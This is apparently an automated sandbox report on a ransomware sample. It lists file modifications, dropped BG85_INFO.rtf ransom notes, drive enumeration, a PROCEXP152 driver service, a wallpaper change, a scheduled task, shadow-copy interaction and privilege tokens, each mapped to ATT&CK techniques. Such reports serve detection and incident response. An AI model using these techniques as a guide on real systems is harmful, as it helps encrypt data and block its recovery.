File opened for modification	C:\Users\Public\Documents\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Public\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exeK9TOpZud64.exe

description	ioc	process
File opened (read-only)	\??\N:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\E:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\B:	K9TOpZud64.exe
File opened (read-only)	\??\J:	K9TOpZud64.exe
File opened (read-only)	\??\W:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\E:	K9TOpZud64.exe
File opened (read-only)	\??\Y:	K9TOpZud64.exe
File opened (read-only)	\??\Z:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\S:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\R:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\M:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\I:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\H:	K9TOpZud64.exe
File opened (read-only)	\??\N:	K9TOpZud64.exe
File opened (read-only)	\??\P:	K9TOpZud64.exe
File opened (read-only)	\??\R:	K9TOpZud64.exe
File opened (read-only)	\??\V:	K9TOpZud64.exe
File opened (read-only)	\??\Y:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\K:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\G:	K9TOpZud64.exe
File opened (read-only)	\??\K:	K9TOpZud64.exe
File opened (read-only)	\??\M:	K9TOpZud64.exe
File opened (read-only)	\??\Q:	K9TOpZud64.exe
File opened (read-only)	\??\S:	K9TOpZud64.exe
File opened (read-only)	\??\W:	K9TOpZud64.exe
File opened (read-only)	\??\X:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\Q:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\L:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\H:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\I:	K9TOpZud64.exe
File opened (read-only)	\??\O:	K9TOpZud64.exe
File opened (read-only)	\??\T:	K9TOpZud64.exe
File opened (read-only)	\??\V:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\U:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\P:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\J:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\F:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\A:	K9TOpZud64.exe
File opened (read-only)	\??\F:	K9TOpZud64.exe
File opened (read-only)	\??\T:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\O:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\G:	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened (read-only)	\??\L:	K9TOpZud64.exe
File opened (read-only)	\??\U:	K9TOpZud64.exe
File opened (read-only)	\??\X:	K9TOpZud64.exe
File opened (read-only)	\??\Z:	K9TOpZud64.exe

Modifies service 2 TTPs 11 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

K9TOpZud64.exevssvc.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152	K9TOpZud64.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152	K9TOpZud64.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\Type = "1"	K9TOpZud64.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ErrorControl = "1"	K9TOpZud64.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\Start = "3"	K9TOpZud64.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	K9TOpZud64.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\LSGOzXyB.bmp"	reg.exe

Drops file in Program Files directory 5639 IoCs

Processes:

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jar.exe	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Google\Update\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-tool-view.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-72x72-precomposed.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail2x.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\policytool.exe	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\jjs.exe	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\include\win32\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reminders_18.svg	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ja_135x40.svg	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\reader\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\PlayStore_icon.svg	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\ui-strings.js	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4636 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4344 vssadmin.exe

pid	process
4636	schtasks.exe

pid	process
4344	vssadmin.exe

Modifies Control Panel 5 IoCs

evasion

Processes:

reg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\WallpaperStyle = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

K9TOpZud64.exe

pid	process
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe
4804	K9TOpZud64.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

K9TOpZud64.exe

pid process

4804 K9TOpZud64.exe

Suspicious use of AdjustPrivilegeToken 103 IoCs

Processes:

K9TOpZud64.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4804	K9TOpZud64.exe
Token: SeLoadDriverPrivilege	4804	K9TOpZud64.exe
Token: SeTakeOwnershipPrivilege	5076	takeown.exe
Token: SeTakeOwnershipPrivilege	4452	takeown.exe
Token: SeTakeOwnershipPrivilege	4640	takeown.exe
Token: SeTakeOwnershipPrivilege	4280	takeown.exe
Token: SeTakeOwnershipPrivilege	5100	takeown.exe
Token: SeTakeOwnershipPrivilege	4776	takeown.exe
Token: SeTakeOwnershipPrivilege	4920	takeown.exe
Token: SeTakeOwnershipPrivilege	5080	takeown.exe
Token: SeTakeOwnershipPrivilege	4412	takeown.exe
Token: SeTakeOwnershipPrivilege	4236	takeown.exe
Token: SeTakeOwnershipPrivilege	4712	takeown.exe
Token: SeTakeOwnershipPrivilege	4896	takeown.exe
Token: SeTakeOwnershipPrivilege	4948	takeown.exe
Token: SeTakeOwnershipPrivilege	640	takeown.exe
Token: SeTakeOwnershipPrivilege	5052	takeown.exe
Token: SeTakeOwnershipPrivilege	4504	takeown.exe
Token: SeTakeOwnershipPrivilege	4812	takeown.exe
Token: SeTakeOwnershipPrivilege	4548	takeown.exe
Token: SeTakeOwnershipPrivilege	8	takeown.exe
Token: SeTakeOwnershipPrivilege	5084	takeown.exe
Token: SeTakeOwnershipPrivilege	4496	takeown.exe
Token: SeTakeOwnershipPrivilege	2648	takeown.exe
Token: SeTakeOwnershipPrivilege	4688	takeown.exe
Token: SeTakeOwnershipPrivilege	4508	takeown.exe
Token: SeBackupPrivilege	5020	vssvc.exe
Token: SeRestorePrivilege	5020	vssvc.exe
Token: SeAuditPrivilege	5020	vssvc.exe
Token: SeTakeOwnershipPrivilege	248	takeown.exe
Token: SeIncreaseQuotaPrivilege	5032	WMIC.exe
Token: SeSecurityPrivilege	5032	WMIC.exe
Token: SeTakeOwnershipPrivilege	5032	WMIC.exe
Token: SeLoadDriverPrivilege	5032	WMIC.exe
Token: SeSystemProfilePrivilege	5032	WMIC.exe
Token: SeSystemtimePrivilege	5032	WMIC.exe
Token: SeProfSingleProcessPrivilege	5032	WMIC.exe
Token: SeIncBasePriorityPrivilege	5032	WMIC.exe
Token: SeCreatePagefilePrivilege	5032	WMIC.exe
Token: SeBackupPrivilege	5032	WMIC.exe
Token: SeRestorePrivilege	5032	WMIC.exe
Token: SeShutdownPrivilege	5032	WMIC.exe
Token: SeDebugPrivilege	5032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5032	WMIC.exe
Token: SeRemoteShutdownPrivilege	5032	WMIC.exe
Token: SeUndockPrivilege	5032	WMIC.exe
Token: SeManageVolumePrivilege	5032	WMIC.exe
Token: 33	5032	WMIC.exe
Token: 34	5032	WMIC.exe
Token: 35	5032	WMIC.exe
Token: 36	5032	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5032	WMIC.exe
Token: SeSecurityPrivilege	5032	WMIC.exe
Token: SeTakeOwnershipPrivilege	5032	WMIC.exe
Token: SeLoadDriverPrivilege	5032	WMIC.exe
Token: SeSystemProfilePrivilege	5032	WMIC.exe
Token: SeSystemtimePrivilege	5032	WMIC.exe
Token: SeProfSingleProcessPrivilege	5032	WMIC.exe
